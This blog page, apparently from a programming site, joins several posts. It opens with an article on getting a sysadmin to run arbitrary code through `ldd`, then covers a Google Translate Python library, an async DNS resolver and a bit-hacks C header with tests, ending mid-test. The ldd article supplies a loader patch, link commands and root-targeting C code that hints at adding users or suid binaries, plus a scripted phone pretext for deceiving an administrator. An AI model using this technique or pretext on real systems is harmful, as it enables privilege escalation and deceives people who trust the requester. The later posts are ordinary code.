The `ldd` utility is more vulnerable than you think. It's frequently used by programmers and system administrators to determine the dynamic library dependencies of executables. Sounds pretty innocent, right? Wrong!

In this article I am going to show you how to create an executable that runs arbitrary code if it's examined by `ldd`. I have also written a social engineering scenario on how you can get your sysadmin to unknowingly hand you his privileges.

I researched this subject thoroughly and found that it's almost completely undocumented. I have no idea how this could have gone unnoticed for such a long time. Here are the only few documents that mention this interesting behavior: 1, 2, 3, 4.

First let's understand how `ldd` works. Take a look at these three examples:

[1] $ ldd /bin/grep
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/libc.so.6 (0xb7eca000)
        /lib/ld-linux.so.2 (0xb801e000)

[2] $ LD_TRACE_LOADED_OBJECTS=1 /bin/grep
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/libc.so.6 (0xb7e30000)
        /lib/ld-linux.so.2 (0xb7f84000)

[3] $ LD_TRACE_LOADED_OBJECTS=1 /lib/ld-linux.so.2 /bin/grep
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/libc.so.6 (0xb7f7c000)
        /lib/ld-linux.so.2 (0xb80d0000)

The first command [1] runs `ldd` on `/bin/grep`. The output is what we expect -- a list of dynamic libraries that `/bin/grep` depends on.

The second command [2] sets the LD_TRACE_LOADED_OBJECTS environment variable and seemingly executes `/bin/grep` (but not quite). Surprisingly the output is the same!

The third command [3] again sets the LD_TRACE_LOADED_OBJECTS environment variable, calls the dynamic linker/loader `ld-linux.so` and passes `/bin/grep` to it as an argument. The output is again the same!

What's going on here?

It turns out that `ldd` is nothing more than a wrapper around the 2nd and 3rd command. In the 2nd and 3rd example `/bin/grep` was never run. That's a peculiarity of the GNU dynamic loader. If it notices the LD_TRACE_LOADED_OBJECTS environment variable, it never executes the program, it outputs the list of dynamic library dependencies and quits. (On BSD `ldd` is a C program that does the same.)

If you are on Linux, take a look at the `ldd` executable. You'll find that it's actually a bash script. If you step through it very carefully, you'll notice that the 2nd command gets executed if the program specified to `ldd` can't be loaded by the `ld-linux.so` loader, and that the 3rd command gets executed if it can.

One particular case when a program won't be handled by `ld-linux.so` is when it has a different loader than the system's default specified in it's .interp ELF section. That's the whole idea in executing arbitrary code with `ldd` -- load the executable via a different loader that does not handle LD_TRACE_LOADED_OBJECTS environment variable but instead executes the program.

For example, you can put a malicious executable in ~/app/bin/exec and have it loaded by ~/app/lib/loader.so. If someone does `ldd /home/you/app/bin/exec` then it's game over for them. They just ran the nasty code you had put in your executable. You can do some social engineering to get the sysadmin to execute `ldd` on your executable allowing you to gain the control over the box.

Compiling the new loader.

Get the uClibc C library. It has pretty code and can be easily patched to bypass the LD_TRACE_LOADED_OBJECTS checks.

$ mkdir app
$ cd app
app$ wget 'http://www.uclibc.org/downloads/uClibc-0.9.30.1.tar.bz2'

Unpack it and run `make menuconfig`, choose the target architecture (most likely i386), leave everything else unchanged.

app$ bunzip2 < uClibc-0.9.30.1.tar.bz2 | tar -vx
app$ rm -rf uClibc-0.9.30.1.tar.bz2
app$ cd uClibc-0.9.30.1
app/uClibc-0.9.30.1$ make menuconfig

Edit .config and set the destination install directory to `/home/you/app/uclibc`.

# change these two lines
RUNTIME_PREFIX="/usr/$(TARGET_ARCH)-linux-uclibc/"
DEVEL_PREFIX="/usr/$(TARGET_ARCH)-linux-uclibc/usr/"

# to this
RUNTIME_PREFIX="/home/you/app/uclibc/"
DEVEL_PREFIX="/home/you/app/uclibc/usr/"

Now we'll need to patch it to bypass LD_TRACE_LOADED_OBJECTS check.

Here is the patch. It patches the `ldso/ldso/ldso.c` file. Save the patch to a file and run `patch -p0 < file`. If you don't do it, arbitrary code execution won't work, because it will think that `ldd` wants to list dependencies.

--- ldso/ldso/ldso-orig.c       2009-10-25 00:27:12.000000000 +0300
+++ ldso/ldso/ldso.c    2009-10-25 00:27:22.000000000 +0300
@@ -404,9 +404,11 @@
        }
 #endif
 
+    /*
        if (_dl_getenv("LD_TRACE_LOADED_OBJECTS", envp) != NULL) {
                trace_loaded_objects++;
        }
+    */
 
 #ifndef __LDSO_LDD_SUPPORT__
        if (trace_loaded_objects) {

Now compile and install it.

app/uClibc-0.9.30.1$ make -j 4
app/uClibc-0.9.30.1$ make install

This will install the uClibc loader and libc library to /home/you/app/uclibc.

That's it. We have now installed uClibc. All we have to do now is link our executable with uClibc's loader (app/lib/ld-uClibc.so.0). It will execute the code if run under `ldd`!

Creating and linking an executable with uClibc's loader.

First let's create a test application that will just print something when executed via `ldd` and let's put it in `app/bin/myapp`

app/uClibc-0.9.30.1$ cd ..
app$ mkdir bin
app$ cd bin
app/bin$ vim myapp.c

Let's write the following in `myapp.c`.

#include <stdio.h>
#include <stdlib.h>

int main() {
  if (getenv("LD_TRACE_LOADED_OBJECTS")) {
    printf("All your box are belong to me.\n");
  }
  else {
    printf("Nothing.\n");
  }
  return 0;
}

This is the most basic code. It checks if LD_TRACE_LOADED_OBJECTS env variable is set or not. If the variable set, the program acts maliciously but if it's not, the program acts as if nothing happened.

The compilation is somewhat complicated because we have to link with the new C library statically (because anyone who might execute our program via `ldd` will not have our new C library in their LD_LIBRARY_PATH) and specify the new loader:

app/bin$ L=/home/you/app/uclibc
app/bin$ gcc -Wl,--dynamic-linker,$L/lib/ld-uClibc.so.0 \
    -Wl,-rpath-link,$L/lib \
    -nostdlib \
    myapp.c -o myapp \
    $L/usr/lib/crt*.o \
    -L$L/usr/lib/ \
    -lc

Here is the explanation of options passed to gcc:

  • -Wl,--dynamic-linker,$L/lib/ld-uClibc.so.0 -- specifies the new loader,
  • -Wl,-rpath-link,$L/lib -- specifies the primary directory where the dynamic loader will look for dependencies,
  • -nostdlib -- don't use system libraries,
  • myapp.c -o myapp -- compile myapp.c to executable myapp,
  • $L/usr/lib/crt*.o -- statically link to initial runtime code, function prolog, epilog,
  • -L$L/usr/lib/ -- search for libc in this directory,
  • -lc -- link with the C library.

Now let's run the new `myapp` executable. First, without ldd:

app/bin$ ./myapp 
Nothing.

LD_TRACE_LOADED_OBJECTS environment variable was not set and the program output "Nothing." as expected.

Now let's run it via `ldd` and for the maximum effect, let's run it from the root shell, as if I was the sysadmin:

app/bin$ su
Password: 
app/bin# ldd ./myapp
<strong>All your box are belong to me.</strong>

Wow! The sysadmin just executed our exploit! He lost the system.

A more sophisticated example.

Here is a more sophisticated example that I just came up with. When run without `ldd` this application fails with a fictitious "error while loading shared libraries" error. When run under `ldd` it checks if the person is root, and owns the box. After that it fakes `ldd` output and pretends to have `libat.so.0` missing.

This code needs a lot of improvements and just illustrates the main ideas.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/*
This example pretends to have a fictitious library 'libat.so.0' missing.
When someone with root permissions runs `ldd this_program`, it does
something nasty in malicious() function.

I haven't implemented anything malicious but have written down some ideas
of what could be done.

This is, of course, a joke program. To make it look more real, you'd have
to bump its size, add some more dependencies, simulate trying to open the
missing library, detect if ran under debugger or strace and do absolutely
nothing suspicious, etc.
*/

void pretend_as_ldd()
{
    printf("\tlinux-gate.so.1 =>  (0xffffe000)\n");
    printf("\tlibat.so.0 => not found\n");
    printf("\tlibc.so.6 => /lib/libc.so.6 (0xb7ec3000)\n");
    printf("\t/lib/ld-linux.so.2 (0xb8017000)\n");
}

void malicious()
{
    if (geteuid() == 0) {
        /* we are root ... */
        printf("poof, all your box are belong to us\n");
        
        /* silently add a new user to /etc/passwd, */
        /* or create a suid=0 program that you can later execute, */
        /* or do something really nasty */
    }
}

int main(int argc, char **argv)
{
    if (getenv("LD_TRACE_LOADED_OBJECTS")) {
        malicious();
        pretend_as_ldd();
        return 0;
    }
    
    printf("%s: error while loading shared libraries: libat.so.0: "
           "cannot open shared object file: No such file or directory\n",
           argv[0]);
    return 127;
}

Actually you can put the code you want to get executed right in the loader itself. This way the executable will always look clean.

Social engineering.

Most system administrators probably don't know that they should never run `ldd` on unfamiliar executables.

Here is a fake scenario on how to get your sysadmin run `ldd` on your executable.

Sysadmin's phone: ring, ring.

Sysadmin: "Mr. sysadmin here. How can I help you?"

You: "Hi. An app that I have been using has started misbehaving. I am getting weird dependency errors. Could you see what is wrong?"

Sysadmin: "Sure. What app is it?"

You: "It's in my home directory, /home/carl/app/bin/myapp. Sometimes when I run it, it says something about 'error while loading shared libraries'."

Sysadmin: "Just a sec." noise from keyboard in the background

Sysadmin: "What was it again? It must be some kind of a library problem. I am going to check its dependencies."

You: "Thanks, it's /home/carl/app/bin/myapp."

Sysadmin: "Hmm. It says it's missing `libat.so.0`, ever heard of it?"

You: "Nope, no idea... I really need to get my work done, can you check on that and get back to me?" evil grin in the background

Sysadmin: "Okay Carl, I'm gonna call you back."

You: "Thanks! See ya."

You: `mv ~/.hidden/working_app ~/app/bin/myapp`.

After a while.

Sysadmin calls: "Hi. It seems to be working now. I don't know what the problem was."

You: "Oh, okay. Thanks!"

Lesson to be learned: Never run `ldd` on unknown executables!

P.S. If you enjoyed this article subscribe to my future posts! I have many more quality articles coming.

Google Python Search LibraryI have extended my xgoogle library with a Python module for Google Translate.

The new module is called "xgoogle.translate" and it implements two classes - "Translator" and "LanguageDetector".

The "Translator" class can be used to translate text. It provides a function called "translate" that takes three arguments - "message", "lang_from" and "lang_to". It returns the translated text as a Unicode string. Don't forget to encode it to the right encoding before outputting, otherwise you'll get errors such as "UnicodeEncodeError: 'latin-1' codec can't encode characters in position 0-3: ordinal not in range(256)"

Here is an example usage of the "Translator" class:

>>> from xgoogle.translate import Translator
>>>
>>> translate = Translator().translate
>>>
>>> print translate("Mani sauc Pēteris", lang_to="en")
My name is Peter
>>>
>>> print translate("Mani sauc Pēteris", lang_to="ru").encode('utf-8')
Меня зовут Петр
>>>
>>> print translate("Меня зовут Петр")
My name is Peter

If "lang_from" is not given, Google's translation service auto-detects it. If "lang_to" is not given, it defaults to "en" (English).

In case of an error, the "translate" function throws "TranslationError" exception with a message why the translation failed. It's best to wrap calls to "translate" in a try/except block:


Program:

>>> from xgoogle.translate import Translator, TranslationError
>>>
>>> try: 
>>>   translate = Translator().translate
>>>   print translate("")
>>> except TranslationError, e:
>>>   print e

Output:

Failed translating: invalid text 

The "LanguageDetector" class can be used to detect the language of the text. It contains a function called "detect".

The "detect" function takes only one argument - message - the piece of text you to detect language of.

It returns a "Language" object that has four properties:

  • lang_code - two letter language code for the given language. For example "ru" for Russian.
  • lang - the name of the language. For example, "Russian".
  • confidence - the confidence level from 0.0 to 1.0 that describes how confident the detector was about the language of the given text.
  • is_reliable - was the detection reliable.

Here is an example of "LanguageDetector":

>>> from xgoogle.translate import LanguageDetector, DetectionError
>>>
>>> detect = LanguageDetector().detect
>>> english = detect("This is a wonderful library.")
>>> english.lang_code
'en'
>>> english.lang
'English'
>>> english.confidence
0.28078437000000001
>>> english.is_reliable
True

In case of a failure "detect" raises a "DetectionError" exception.

These two classes interact with the Google Ajax Language API to do their job. Since this Ajax service returns JSON string, you'll need to install simplejson Python module. It should be as easy as typing "easy_install simplejson".

Download "xgoogle" library:

Download: xgoogle library (.zip)
Downloaded: 23800 times.
Download url: http://www.catonmat.net/download/xgoogle.zip

I haven't yet posted this library to pypi but I will soon do it.

Asynchronous DNSOnce upon a time, I had to quickly resolve thousands of DNS names. My first solution was to call gethostbyname repeatedly for each of the hosts. This turned out to be extremely slow. I could only do 200 hosts in a minute. I talked with someone and he suggested to try to do it asynchronously. I looked around and found adns - asynchronous dns library. Since I was writing the code in Python, I looked around some more and found Python bindings for adns. I tried adns and - wow - I could do 20000 hosts in a minute!

In this post I want to share the slow code and the fast asynchronous code. The slow code is only useful if you need to resolve just several domains. The asynchronous code is much more useful. I made it as a Python module so that you can reuse it. It's called "async_dns.py" and an example of how to use it is included at the bottom of the post.

Here is the slow code that uses gethostbyname. The only reusable part of this code is "resolve_slow" function that takes a list of hosts to resolve, resolves them, and returns a dictionary containing { host: ip } pairs.

To measure how fast it is I made it resolve hosts "www.domain0.com", "www.domain1.com", ..., "www.domain999.com" and print out how long the whole process took.

#!/usr/bin/python

import socket
from time import time

def resolve_slow(hosts):
    """
    Given a list of hosts, resolves them and returns a dictionary
    containing {'host': 'ip'}.
    If resolution for a host failed, 'ip' is None.
    """
    resolved_hosts = {}
    for host in hosts:
        try:
            host_info = socket.gethostbyname(host)
            resolved_hosts[host] = host_info
        except socket.gaierror, err:
            resolved_hosts[host] = None
    return resolved_hosts

if __name__ == "__main__":
    host_format = "www.domain%d.com"
    number_of_hosts = 1000

    hosts = [host_format % i for i in range(number_of_hosts)]

    start = time()
    resolved_hosts = resolve_slow(hosts)
    end = time()

    print "It took %.2f seconds to resolve %d hosts." % (end-start, number_of_hosts)

And here is the fast code that uses adns. I created a class "AsyncResolver" that can be reused if you import it from this code. Just like "resolve_slow" from the previous code example, it takes a list of hosts to resolve and returns a dictionary of { host: ip } pairs.

If you run this code, it will print out how long it took to resolve 20000 hosts.

#!/usr/bin/python
#

import adns
from time import time

class AsyncResolver(object):
    def __init__(self, hosts, intensity=100):
        """
        hosts: a list of hosts to resolve
        intensity: how many hosts to resolve at once
        """
        self.hosts = hosts
        self.intensity = intensity
        self.adns = adns.init()

    def resolve(self):
        """ Resolves hosts and returns a dictionary of { 'host': 'ip' }. """
        resolved_hosts = {}
        active_queries = {}
        host_queue = self.hosts[:]

        def collect_results():
            for query in self.adns.completed():
                answer = query.check()
                host = active_queries[query]
                del active_queries[query]
                if answer[0] == 0:
                    ip = answer[3][0]
                    resolved_hosts[host] = ip
                elif answer[0] == 101: # CNAME
                    query = self.adns.submit(answer[1], adns.rr.A)
                    active_queries[query] = host
                else:
                    resolved_hosts[host] = None

        def finished_resolving():
            return len(resolved_hosts) == len(self.hosts)

        while not finished_resolving():
            while host_queue and len(active_queries) < self.intensity:
                host = host_queue.pop()
                query = self.adns.submit(host, adns.rr.A)
                active_queries[query] = host
            collect_results()

        return resolved_hosts

if __name__ == "__main__":
    host_format = "www.host%d.com"
    number_of_hosts = 20000

    hosts = [host_format % i for i in range(number_of_hosts)]

    ar = AsyncResolver(hosts, intensity=500)
    start = time()
    resolved_hosts = ar.resolve()
    end = time()

    print "It took %.2f seconds to resolve %d hosts." % (end-start, number_of_hosts)

I wrote it in a manner that makes it reusable in other programs. Here is an example of how to reuse this code:

from async_dns import AsyncResolver

ar = AsyncResolver(["www.google.com", "www.reddit.com", "www.nonexistz.net"])
resolved = ar.resolve()

for host, ip in resolved.items():
  if ip is None:
    print "%s could not be resolved." % host
  else:
    print "%s resolved to %s" % (host, ip)

Output:

www.nonexistz.net could not be resolved.
www.reddit.com resolved to 159.148.86.207
www.google.com resolved to 74.125.39.99

Download "async_dns.py":

Download: async_dns.py
Downloaded: 4694 times.
Download url: http://www.catonmat.net/download/async_dns.py

I hope someone finds this useful!

Bit HacksA part of being a great programmer is having your personal code library. With a personal code library I mean a repository of code that you have an intimate knowledge of and that you can reuse quickly. If you are a C programmer, you don't want to reimplement linked lists, trees, various utility functions, macros and algorithms each time you write a new program. Rather you want to take them from your repository, adjust and incorporate in your code.

A good example is the implementation of linked lists in the Linux kernel. Every kernel developer knows it and uses it if necessary. They wouldn't reimplement it. Another example is all the code written by djb. It's so good that people have taken it and turned into libdjb code library.

With this article I'd like to open a new topic in this blog where I share code from my personal code library. I'll start with a C header file that I created just recently based on my Bit Hacks You Should Know About article.

This header file is called "bithacks.h" and it contains various macros for bit manipulations. I also wrote tests for all the macros in the "bithacks-test.c" program.

The most beautiful part of "bithacks.h" is the "B8" macro that allows to write something like " x = B8(10101010) " and turns it into " x = 170 " (because 10101010 in binary is 170 in decimal). I have not yet added B16 and B32 macros but I will add them when I publish the article on advanced bithacks. The credit for the B8 idea goes to Tom Torfs who was the first to write it.

The "bithacks.h" header provides the following macros:

  • B8(x) - turns x written in binary into decimal,
  • B_EVEN(x) - tests if x is even (bithack #1),
  • B_ODD(x) - tests if x is odd (inverse of (bithack #1)),
  • B_IS_SET(x, n) - tests if n-th bit is set in x (bithack #2),
  • B_SET(x, n) - sets n-th bit in x (bithack #3),
  • B_UNSET(x, n) - unsets n-th bit in x (bithack #4),
  • B_TOGGLE(x, n) - toggles n-th bit in x (bithack #5),
  • B_TURNOFF_1(x) - turns off the right-most 1-bit in x (bithack #6),
  • B_ISOLATE_1(x) - isolates the right-most 1-bit in x (bithack #7),
  • B_PROPAGATE_1(x) - propagates the right-most 1-bit in x (bithack #8),
  • B_ISOLATE_0(x) - isolates the right-most 0-bit in x (bithack #9),
  • B_TURNON_0(x) - turn on the right-most 0-bit in x (bithack #10).

Please see "bithacks-test.c" for many examples of these macros.

For those who don't want to download bithacks.h, here is its content:

/* 
** bithacks.h - bit hacks macros. v1.0
**
** Released under the MIT license.
*/

#ifndef BITHACKS_H
#define BITHACKS_H

#define HEXIFY(X) 0x##X##LU

#define B8IFY(Y) (((Y&0x0000000FLU)?1:0)  + \
                  ((Y&0x000000F0LU)?2:0)  + \
                  ((Y&0x00000F00LU)?4:0)  + \
                  ((Y&0x0000F000LU)?8:0)  + \
                  ((Y&0x000F0000LU)?16:0) + \
                  ((Y&0x00F00000LU)?32:0) + \
                  ((Y&0x0F000000LU)?64:0) + \
                  ((Y&0xF0000000LU)?128:0))

#define B8(Z) ((unsigned char)B8IFY(HEXIFY(Z)))

/* test if x is even */
#define B_EVEN(x)        (((x)&1)==0)

/* test if x is odd */
#define B_ODD(x)         (!B_EVEN((x)))

/* test if n-th bit in x is set */
#define B_IS_SET(x, n)   (((x) & (1<<(n)))?1:0)

/* set n-th bit in x */
#define B_SET(x, n)      ((x) |= (1<<(n)))

/* unset n-th bit in x */
#define B_UNSET(x, n)    ((x) &= ~(1<<(n)))

/* toggle n-th bit in x */
#define B_TOGGLE(x, n)   ((x) ^= (1<<(n)))

/* turn off right-most 1-bit in x */
#define B_TURNOFF_1(x)   ((x) &= ((x)-1))

/* isolate right-most 1-bit in x */
#define B_ISOLATE_1(x)   ((x) &= (-(x)))

/* right-propagate right-most 1-bit in x */
#define B_PROPAGATE_1(x) ((x) |= ((x)-1))

/* isolate right-most 0-bit in x */
#define B_ISOLATE_0(x)   ((x) = ~(x) & ((x)+1))

/* turn on right-most 0-bit in x */
#define B_TURNON_0(x)    ((x) |= ((x)+1))

/*
** more bit hacks coming as soon as I post
** an article on advanced bit hacks
*/

#endif

And here are all the tests:

/* 
** bithacks-test.c - tests for bithacks.h
**
** Released under the MIT license.
*/

#include <stdio.h>
#include <stdlib.h>

#include "bithacks.h"

int error_count;

#define TEST_OK(exp, what) do { \
    if ((exp)!=(what)) { \
        error_count++; \
        printf("Test '%s' at line %d failed.\n", #exp, __LINE__); \
    } } while(0)

#define TEST_END do { \
    if (error_count) { \
        printf("Testing failed: %d failed tests.\n", error_count); \
    } else { \
        printf("All tests OK.\n"); \
    } } while (0)

void test_B8()
{
    /* test B8 */
    TEST_OK(B8(0), 0);
    TEST_OK(B8(1), 1);
    TEST_OK(B8(11), 3);
    TEST_OK(B8(111), 7);
    TEST_OK(B8(1111), 15);
    TEST_OK(B8(11111), 31);
    TEST_OK(B8(111111), 63);
    TEST_OK(B8(1111111), 127);
    TEST_OK(B8(00000000), 0);
    TEST_OK(B8(11111111), 255);
    TEST_OK(B8(1010), 10);
    TEST_OK(B8(10101010), 170);
    TEST_OK(B8(01010101), 85);
}

void test_B_EVEN()
{
    /* test B_EVEN */
    TEST_OK(B_EVEN(B8(0)), 1);
    TEST_OK(B_EVEN(B8(00000000)), 1);
    TEST_OK(B_EVEN(B8(1)), 0);
    TEST_OK(B_EVEN(B8(11111111)), 0);
    TEST_OK(B_EVEN(B8(10101010)), 1);
    TEST_OK(B_EVEN(B8(01010101)), 0);
    TEST_OK(B_EVEN(44), 1);
    TEST_OK(B_EVEN(131), 0);
}

void test_B_ODD()
{
    /* test B_ODD */
    TEST_OK(B_ODD(B8(0)), 0);
    TEST_OK(B_ODD(B8(00000000)), 0);
    TEST_OK(B_ODD(B8(1)), 1);
    TEST_OK(B_ODD(B8(11111111)), 1);
    TEST_OK(B_ODD(B8(10101010)), 0);
    TEST_OK(B_ODD(B8(01010101)), 1);
    TEST_OK(B_ODD(44), 0);
    TEST_OK(B_ODD(131), 1);
}

void test_B_IS_SET()
{
    /* test B_IS_SET */
    TEST_OK(B_IS_SET(B8(0), 0), 0);
    TEST_OK(B_IS_SET(B8(00000000), 0), 0);
    TEST_OK(B_IS_SET(B8(1), 0), 1);
    TEST_OK(B_IS_SET(B8(11111111), 0), 1);
    TEST_OK(B_IS_SET(B8(11111111), 1), 1);
    TEST_OK(B_IS_SET(B8(11111111), 2), 1);
    TEST_OK(B_IS_SET(B8(11111111), 3), 1);
    TEST_OK(B_IS_SET(B8(11111111), 4), 1);
    TEST_OK(B_IS_SET(B8(11111111), 5), 1);
    TEST_OK(B_IS_SET(B8(11111111), 6), 1);
    TEST_OK(B_IS_SET(B8(11111111), 7), 1);
    TEST_OK(B_IS_SET(B8(11110000), 0), 0);
    TEST_OK(B_IS_SET(B8(11110000), 1), 0);
    TEST_OK(B_IS_SET(B8(11110000), 2), 0);
    TEST_OK(B_IS_SET(B8(11110000), 3), 0);
    TEST_OK(B_IS_SET(B8(11110000), 4), 1);
    TEST_OK(B_IS_SET(B8(11110000), 5), 1);
    TEST_OK(B_IS_SET(B8(11110000), 6), 1);
    TEST_OK(B_IS_SET(B8(11110000), 7), 1);
    TEST_OK(B_IS_SET(B8(00001111), 0), 1);
    TEST_OK(B_IS_SET(B8(00001111), 1), 1);
    TEST_OK(B_IS_SET(B8(00001111), 2), 1);
    TEST_OK(B_IS_SET(B8(00001111), 3), 1);
    TEST_OK(B_IS_SET(B8(00001111), 4), 0);
    TEST_OK(B_IS_SET(B8(00001111), 5), 0);
    TEST_OK(B_IS_SET(B8(00001111), 6), 0);
    TEST_OK(B_IS_SET(B8(00001111), 7), 0);
    TEST_OK(B_IS_SET(B8(10101010), 0), 0);
    TEST_OK(B_IS_SET(B8(10101010), 1), 1);
    TEST_OK(B_IS_SET(B8(10101010), 2), 0);
    TEST_OK(B_IS_SET(B8(10101010), 3), 1);
    TEST_OK(B_IS_SET(B8(10101010), 4), 0);
    TEST_OK(B_IS_SET(B8(10101010), 5), 1);
    TEST_OK(B_IS_SET(B8(10101010), 6), 0);
    TEST_OK(B_IS_SET(B8(10101010), 7), 1);
    TEST_OK(B_IS_SET(B8(01010101), 0), 1);
    TEST_OK(B_IS_SET(B8(01010101), 1), 0);
    TEST_OK(B_IS_SET(B8(01010101), 2), 1);
    TEST_OK(B_IS_SET(B8(01010101), 3), 0);
    TEST_OK(B_IS_SET(B8(01010101), 4), 1);
    TEST_OK(B_IS_SET(B8(01010101), 5), 0);
    TEST_OK(B_IS_SET(B8(01010101), 6), 1);
    TEST_OK(B_IS_SET(B8(01010101), 7), 0);
}

void test_B_SET()
{
    /* test B_SET */
    unsigned char x;

    x = B8(00000000);
    TEST_OK(B_SET(x, 0), B8(00000001));
    TEST_OK(B_SET(x, 1), B8(00000011));
    TEST_OK(B_SET(x, 2), B8(00000111));
    TEST_OK(B_SET(x, 3), B8(00001111));
    TEST_OK(B_SET(x, 4), B8(00011111));
    TEST_OK(B_SET(x, 5), B8(00111111));
    TEST_OK(B_SET(x, 6), B8(01111111));
    TEST_OK(B_SET(x, 7), B8(11111111));

    x = B8(11111111);
    TEST_OK(B_SET(x, 0), B8(11111111));
    TEST_OK(B_SET(x, 1), B8(11111111));
    TEST_OK(B_SET(x, 2), B8(11111111));
    TEST_OK(B_SET(x, 3), B8(11111111));
    TEST_OK(B_SET(x, 4), B8(11111111));
    TEST_OK(B_SET(x, 5), B8(11111111));
    TEST_OK(B_SET(x, 6), B8(11111111));
    TEST_OK(B_SET(x, 7), B8(11111111));
}

void test_B_UNSET()
{
    unsigned char x;
   
    x = B8(11111111);
    TEST_OK(B_UNSET(x, 0), B8(11111110));
    TEST_OK(B_UNSET(x, 1), B8(11111100));
    TEST_OK(B_UNSET(x, 2), B8(11111000));
    TEST_OK(B_UNSET(x, 3), B8(11110000));
    TEST_OK(B_UNSET(x, 4), B8(11100000));
    TEST_OK(B_UNSET(x, 5), B8(11000000));
    TEST_OK(B_UNSET(x, 6), B8(10000000));
    TEST_OK(B_UNSET(x, 7), B8(00000000));

    x = B8(00000000);
    TEST_OK(B_UNSET(x, 0), B8(00000000));
    TEST_OK(B_UNSET(x, 1), B8(00000000));
    TEST_OK(B_UNSET(x, 2), B8(00000000));
    TEST_OK(B_UNSET(x, 3), B8(00000000));
    TEST_OK(B_UNSET(x, 4), B8(00000000));
    TEST_OK(B_UNSET(x, 5), B8(00000000));
    TEST_OK(B_UNSET(x, 6), B8(00000000));
    TEST_OK(B_UNSET(x, 7), B8(00000000));
}

void test_B_TOGGLE()
{
    unsigned char x = B8(11111111);
    TEST_OK(B_TOGGLE(x, 0), B8(11111110));
    TEST_OK(B_TOGGLE(x, 0), B8(11111111));
    TEST_OK(B_TOGGLE(x, 1), B8(11111101));
    TEST_OK(B_TOGGLE(x, 1), B8(11111111));
    TEST_OK(B_TOGGLE(x, 2), B8(11111011));
    TEST_OK(B_TOGGLE(x, 2), B8(11111111));
    TEST_OK(B_TOGGLE(x, 3), B8(11110111));
    TEST_OK(B_TOGGLE(x, 3), B8(11111111));
    TEST_OK(B_TOGGLE(x, 4), B8(11101111));
    TEST_OK(B_TOGGLE(x, 4), B8(11111111));
    TEST_OK(B_TOGGLE(x, 5), B8(11011111));
    TEST_OK(B_TOGGLE(x, 5), B8(11111111));
    TEST_OK(B_TOGGLE(x, 6), B8(10111111));
    TEST_OK(B_TOGGLE(x, 6), B8(11111111));
    TEST_OK(B_TOGGLE(x, 7), B8(01111111));
    TEST_OK(B_TOGGLE(x, 7), B8(11111111));
}

void test_B_TURNOFF_1()
{
    unsigned char x;

    x = B8(11111111);
    TEST_OK(B_TURNOFF_1(x), B8(11111110));
    TEST_OK(B_TURNOFF_1(x), B8(11111100));
    TEST_OK(B_TURNOFF_1(x), B8(11111000));
    TEST_OK(B_TURNOFF_1(x), B8(11110000));
    TEST_OK(B_TURNOFF_1(x), B8(11100000));
    TEST_OK(B_TURNOFF_1(x), B8(11000000));
    TEST_OK(B_TURNOFF_1(x), B8(10000000));
    TEST_OK(B_TURNOFF_1(x), B8(00000000));
    TEST_OK(B_TURNOFF_1(x), B8(00000000));

    x = B8(10101010);
    TEST_OK(B_TURNOFF_1(x), B8(10101000));
    TEST_OK(B_TURNOFF_1(x), B8(10100000));
    TEST_OK(B_TURNOFF_1(x), B8(10000000));
    TEST_OK(B_TURNOFF_1(x), B8(00000000));
    TEST_OK(B_TURNOFF_1(x), B8(00000000));

    x = B8(01010101);
    TEST_OK(B_TURNOFF_1(x), B8(01010100));
    TEST_OK(B_TURNOFF_1(x), B8(01010000));
    TEST_OK(B_TURNOFF_1(x), B8(01000000));
    TEST_OK(B_TURNOFF_1(x), B8(00000000));
    TEST_OK(B_TURNOFF_1(x), B8(00000000));
}

void test_B_ISOLATE_1()
{
    unsigned char x;

    x = B8(11111111);
    TEST_OK(B_ISOLATE_1(x), B8(00000001));
    TEST_OK(B_ISOLATE_1(x), B8(00000001));

    x = B8(11111110);
    TEST_OK(B_ISOLATE_1(x), B8(00000010));
    TEST_OK(B_ISOLATE_1(x), B8(00000010));

    x = B8(11111100);
    TEST_OK(B_ISOLATE_1(x), B8(00000100));
    TEST_OK(B_ISOLATE_1(x), B8(00000100));

    x = B8(11111000);
    TEST_OK(B_ISOLATE_1(x), B8(00001000));
    TEST_OK(B_ISOLATE_1(x), B8(00001000));

    x = B8(11110000);
    TEST_OK(B_ISOLATE_1(x), B8(00010000));
    TEST_OK(B_ISOLATE_1(x), B8(00010000));

    x = B8(11100000);
    TEST_OK(B_ISOLATE_1(x), B8(00100000));
    TEST_OK(B_ISOLATE_1(x), B8(00100000));

    x = B8(11000000);
    TEST_OK(B_ISOLATE_1(x), B8(01000000));
    TEST_OK(B_ISOLATE_1(x), B8(01000000));

    x = B8(10000000);
    TEST_OK(B_ISOLATE_1(x), B8(10000000));
    TEST_OK(B_ISOLATE_1(x), B8(10000000));

    x = B8(00000000);
    TEST_OK(B_ISOLATE_1(x), B8(00000000));

    x = B8(10000000);
    TEST_OK(B_ISOLATE_1(x), B8(10000000));

    x = B8(10001001);
    TEST_OK(B_ISOLATE_1(x), B8(00000001));

    x = B8(10001000);
    TEST_OK(B_ISOLATE_1(x), B8(00001000));
}

void test_B_PROPAGATE_1()
{
    unsigned char x;

    x = B8(00000000);
    TEST_OK(B_PROPAGATE_1(x), B8(11111111));
    TEST_OK(B_PROPAGATE_1(x), B8(11111111));

    x = B8(10000000);
    TEST_OK(B_PROPAGATE_1(x), B8(11111111));

    x = B8(11000000);
    TEST_OK(B_PROPAGATE_1(x), B8(11111111));

    x = B8(11100000);
    TEST_OK(B_PROPAGATE_1(x), B8(11111111));

    x = B8(11110000);
    TEST_OK(B_PROPAGATE_1(x), B8(11111111));

    x = B8(11111000);
    TEST_OK(B_PROPAGATE_1(x), B8(11111111));

    x = B8(11111100);
    TEST_OK(B_PROPAGATE_1(x), B8(11111111));

    x = B8(11111110);
    TEST_OK(B_PROPAGATE_1(x), B8(11111111));

    x = B8(11111111);
    TEST_OK(B_PROPAGATE_1(x), B8(11111111));

    x = B8(00100000);
    TEST_OK(B_PROPAGATE_1(x), B8(00111111));
    TEST_OK(B_PROPAGATE_1(x), B8(00111111));

    x = B8(10101000);
    TEST_OK(B_PROPAGATE_1(x), B8(10101111));
    TEST_OK(B_PROPAGATE_1(x), B8(10101111));

    x = B8(10101010);
    TEST_OK(B_PROPAGATE_1(x), B8(10101011));
    TEST_OK(B_PROPAGATE_1(x), B8(10101011));

    x = B8(10101010);
    TEST_OK(B_PROPAGATE_1(x), B8(10101011));
